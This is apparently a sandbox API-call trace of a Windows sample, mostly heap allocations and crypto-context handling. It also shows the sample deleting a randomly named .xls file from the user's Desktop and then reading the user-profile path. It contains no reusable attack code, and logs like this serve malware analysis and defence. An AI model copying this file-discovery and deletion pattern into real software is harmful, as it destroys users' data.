[0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0216.618] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x2e69bc8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0216.618] GetProcAddress (hModule=0x756e0000, lpProcName="CryptReleaseContext") returned 0x756ffbc0 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.618] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.618] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0216.619] CryptReleaseContext (hProv=0xa5f958, dwFlags=0x0) returned 1 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0216.619] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.619] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.620] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0216.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0216.621] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507e8 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0216.621] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0216.621] FreeLibrary (hLibModule=0x756e0000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0216.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0216.621] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0216.621] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0216.621] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.621] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50638 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50458 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505a8 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0216.622] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0216.622] CloseHandle (hObject=0x2a0) returned 1 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0216.622] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04008 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0216.623] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0216.623] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.623] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0216.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0216.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.624] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0216.624] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0216.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0216.688] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0216.689] CloseHandle (hObject=0x2d0) returned 1 [0216.802] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0216.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0216.802] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0216.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0216.803] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.805] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0216.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0216.806] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c48 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0216.806] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0216.806] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/_BsqZItCPNq0eBuQ.xls", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\_BsqZItCPNq0eBuQ.xls", lpFilePart=0x8cedf4*="_BsqZItCPNq0eBuQ.xls") returned 0x2c [0216.806] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_BsqZItCPNq0eBuQ.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\_bsqzitcpnq0ebuq.xls")) returned 0x20 [0216.806] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\_BsqZItCPNq0eBuQ.xls", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc381a090, ftCreationTime.dwHighDateTime=0x1d5f02b, ftLastAccessTime.dwLowDateTime=0x892f8260, ftLastAccessTime.dwHighDateTime=0x1d5e697, ftLastWriteTime.dwLowDateTime=0x892f8260, ftLastWriteTime.dwHighDateTime=0x1d5e697, nFileSizeHigh=0x0, nFileSizeLow=0x80a1, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="_BsqZItCPNq0eBuQ.xls", cAlternateFileName="_BSQZI~1.XLS")) returned 0xa87390 [0216.807] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_BsqZItCPNq0eBuQ.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\_bsqzitcpnq0ebuq.xls")) returned 1 [0216.905] FindNextFileW (in: hFindFile=0xa87390, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc381a090, ftCreationTime.dwHighDateTime=0x1d5f02b, ftLastAccessTime.dwLowDateTime=0x892f8260, ftLastAccessTime.dwHighDateTime=0x1d5e697, ftLastWriteTime.dwLowDateTime=0x892f8260, ftLastWriteTime.dwHighDateTime=0x1d5e697, nFileSizeHigh=0x0, nFileSizeLow=0x80a1, dwReserved0=0xfffffffc, dwReserved1=0x8cf25c, cFileName="_BsqZItCPNq0eBuQ.xls", cAlternateFileName="_BSQZI~1.XLS")) returned 0 [0216.905] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0216.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0216.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0216.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53728 | out: hHeap=0x970000) returned 1 [0216.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0216.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0216.905] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0216.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e539b0 [0216.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0216.905] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf560 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0216.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0216.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0216.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53848 | out: hHeap=0x970000) returned 1 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bd8 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53878 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b98 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0216.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x5a) returned 0x2e563a8 [0216.906] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/_BsqZItCPNq0eBuQ.xls", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\_BsqZItCPNq0eBuQ.xls", lpFilePart=0x8cf650*="_BsqZItCPNq0eBuQ.xls") returned 0x2c [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e563a8 | out: hHeap=0x970000) returned 1 [0216.906] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\_BsqZItCPNq0eBuQ.xls" (normalized: "c:\\users\\fd1hvy\\desktop\\_bsqzitcpnq0ebuq.xls")) returned 0xffffffff [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e539b0 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53890 | out: hHeap=0x970000) returned 1 [0216.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53818 | out: hHeap=0x970000) returned 1 [0216.906] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0216.907] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77788 | out: hHeap=0x970000) returned 1 [0216.907] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0216.907] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7ff10 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0216.907] CharUpperBuffW (in: lpsz="_FILELISTTOARRAY", cchLength=0x10 | out: lpsz="_FILELISTTOARRAY") returned 0x10 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7ff10 | out: hHeap=0x970000) returned 1 [0216.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53818 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53848 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0216.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0216.907] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3e0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") 